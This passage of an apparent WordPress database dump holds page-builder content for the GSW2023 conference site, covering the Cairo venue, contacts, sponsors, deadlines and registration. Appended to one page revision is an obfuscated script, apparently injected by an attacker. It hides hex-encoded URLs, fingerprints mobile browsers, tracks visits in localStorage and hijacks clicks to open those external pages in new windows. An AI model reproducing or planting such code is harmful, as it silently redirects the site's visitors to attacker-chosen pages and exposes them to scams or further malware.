prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:42:41','2023-04-22 12:42:41','',3066,'https://gsw2023.com/?p=4093',0,'revision','',0),
(4094,1,'2023-04-22 12:47:10','2023-04-22 12:47:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1682167355428{margin-top: 20px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1682167626440{margin-top: -50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px 